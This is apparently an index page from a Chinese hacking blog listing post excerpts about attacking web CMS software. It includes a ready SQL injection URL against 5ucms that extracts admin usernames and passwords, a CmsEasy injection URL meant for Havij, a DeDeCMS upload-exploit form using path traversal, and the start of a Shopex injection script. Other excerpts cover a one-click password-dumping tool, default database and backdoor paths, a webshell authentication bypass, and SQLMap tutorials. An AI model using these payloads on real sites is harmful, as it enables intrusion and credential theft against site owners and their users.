DeDeCMS v5.7最新利用工具[一键暴密码]0day

使用说明: 1、输入被检测网站的地址 2、请等待,时间取决于你的网络状况,和网站的速度。 3、如果网站没有漏洞的话会弹出提示。 4、成功的话会弹出一个窗口复制密码去破解就好了。 下载地址:DeDeCMS

- 阅读全文 -

Shopex 4.8.5 SQL Injection Exp

<script language="javascript"> function expstart() { var url = document.forms[0].url.value; if(url != ""){ if(url.search("http://") < 0 && url.search("https://") < 0){ url = "http:...

- 阅读全文 -

织梦cms v6.7最新上传漏洞

EXp: <form action="http://127.0.0.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">...

- 阅读全文 -

5ucms 最新版 sql 注入漏洞

漏洞EXP↓  /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin 放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用。

- 阅读全文 -

SQLMAP 注射工具用法

1 。  介绍 1.1 要求 1.2 网应用情节 1.3 SQL 射入技术 1.4 特点 1.5 下载和更新sqlmap 1.6 执照 2 。 用法 2.1 帮助 2.2 目标URL 2.3 目标URL 和verbosity 2.4 URL 参量 2.5 Google dork 2.6 HTTP 方法: 得到或张贴 2.7 张贴的数据串 2.8 HTTP 曲奇饼倒栽跳水 2.9 HTTP 用户代理...

- 阅读全文 -

SQLmap工具介绍及其使用

http://sqlmap.sourceforge.net/ 这是SEVEN大哥写的!: 从黑防上看到他们说是有什么内部的工具,国外的注入工具,python的。想下载看看,结果是vip工具。 就从百度上搜索,没有发现。看来在国内还没有流行。就直接去google上搜索去了。 结果发现了这个工具。 功能非常强大。 我以前的想法,这个工具全都实现了。而且功能更强。新一代的强大工具。我还没有时间来得及分析...

- 阅读全文 -

WindowsXP上安装和运行神器SqlMap的步骤

本文要介绍的是如何在Windows XP上安装和运行SqlMap的安装步骤。 在Windows XP上安装和运行SqlMap的步骤…… 1、首先下载SqlMap 点击下载。 2、其次下载用于Windows系统的Python ……点击这里…… 3、然后安装Python: Python默认安装的路径是“C:\Python”(你也可以修改安装路径,但要记住路径),直接默认安装“下一步”OK … :) 4...

- 阅读全文 -

在线订单站的一些渗透思路和后门

作者:黑面 上现在出现了很多单页面单产品的在线网购站,很多童鞋看了认为很难下手,完全没有思路,其实有的站还是很简单的,我大概总结下我碰到的一些漏洞和后门。 ASP的站基本都是用套叫企业通用管理系统XP版的程序做的。 1.默认数据库 /data/data.asp /data/data.mdb 2.暴库 /inc/conn.asp /inc/lconn.asp /admin/conn.asp /adm...

- 阅读全文 -

CmsEasy易通企业网站系统最新注入漏洞

易通企业网站系统最新注入漏洞。 注入EXP: https://www.webshell.cc/celive/js/include.php?cmseasylive=1111&departmentid=0 直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,password 百度关键字:Powered by CmsE...

- 阅读全文 -

Phpspy 2011继续身份验证绕过漏洞

Author: Tm3yShell7 官方目前下载已经修补上了 目前官方下载是2011.php, 文件名为2011ok.php的是带洞版本。 今天m0r5和我说phpspy2011 我都不知道2011出来了  - - 就下下来看看 发现2011有不少借鉴WSO Shell的地方,看到$pass还是在那个函数的上面,但是验证成功过后用了一个Location重定向了一下,之后会再次检查一次cookie...

- 阅读全文 -